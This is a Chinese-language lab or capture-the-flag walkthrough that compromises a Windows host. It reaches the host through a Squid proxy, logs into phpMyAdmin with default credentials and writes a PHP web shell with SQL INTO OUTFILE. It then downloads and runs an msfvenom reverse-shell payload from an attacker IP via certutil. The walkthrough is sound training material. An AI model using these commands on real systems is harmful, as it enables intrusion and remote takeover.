Recon

第一步先來看看這臺機器上有什麼服務
PS. 這邊所使用的列舉程式來自 https://github.com/21y4d/nmapAutomator ，這個腳本可以幫我們自動用不同的工具做資訊蒐集與掃描

sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.248.189 -type script;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.248.189 -type full;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.248.189 -type udp;sudo ~/Arsenal/nmapAutomator/nmapAutomator_mod.sh --host 192.168.248.189 -type recon;

在 port 3128 上有一個 HTTP Proxy http://squid:3128/

Initial Access & Privilege Escalation

因為我們對這個服務不太清楚，上網看了一下 hacktrick 的滲透方式
原來可以透過一個 Python 檔去做內網掃描的服務 https://book.hacktricks.wiki/en/network-services-pentesting/3128-pentesting-squid.html

下載完 Hacktrick 上的 Python 檔以後按照他的指令輸入

python spose.py --proxy http://$tIP:3128 --target $tIP

掃描完成後發現2個很有趣的服務 原來這2個服務藏在代理器的後面 難怪我們沒有掃描到
現在我們可以透過 CURL 去透過 Port 3128 去碰觸 Port8080

curl --proxy http://$tIP:3128 http://$tIP:8080

為了方便閱讀，我們設定 FoxyProxy 這樣我們就可以透過 FoxyProxy 執行 FireFox 去讀取這個網頁

Port 8080上面開了一個叫做 Wampserver 的網頁，往下滑會發現它還列出了其它的服務在上面
那我們就把有開的服務都看一下可以收集到什麼樣的資訊

http://192.168.248.189:8080 

http://192.168.248.189:8080/?phpinfo=-1 

http://192.168.248.189:8080/phpsysinfo/index.php?disp=bootstrap 

PhpAdmin是 PHP 的管理後臺，一般來說不會對外開放
不過竟然看到了，這邊我們就先試試看預設的帳號密碼可否登錄

http://192.168.248.189:8080/phpmyadmin/ 

Bingo! 竟然可以登入，那我們就可以使用他提供的 SQL console 來執行 SQL 命令
我們現在要準備寫入一個 web shell 到剛剛發現的網站根目錄中 c:\wamp\www

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:/wamp/www/webshell.php"

看起來 web shell 可以成功執行
但令我們更興奮的是只要順利拿到這個的 reverse shell 我們就會是 administrator 的權限

http://192.168.248.189:8080/webshell.php?cmd=whoami

事不宜遲，現在我們利用 msfvenom 去產生一個 exe 的執行檔，並且利用 web shell 去下載這個檔案到靶機上
設定好監聽後，接著直接執行!

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.197 LPORT=443 -f exe -o rShell.exe

http://192.168.248.189:8080/webshell.php?cmd=certutil.exe%20-urlcache%20-f%20http://192.168.45.197:8000/rShell.exe%20rShell.exe
http://192.168.248.189:8080/webshell.php?cmd=rShell.exe

最後我們順利拿到了這個 shell 也拿到了2個 flags :)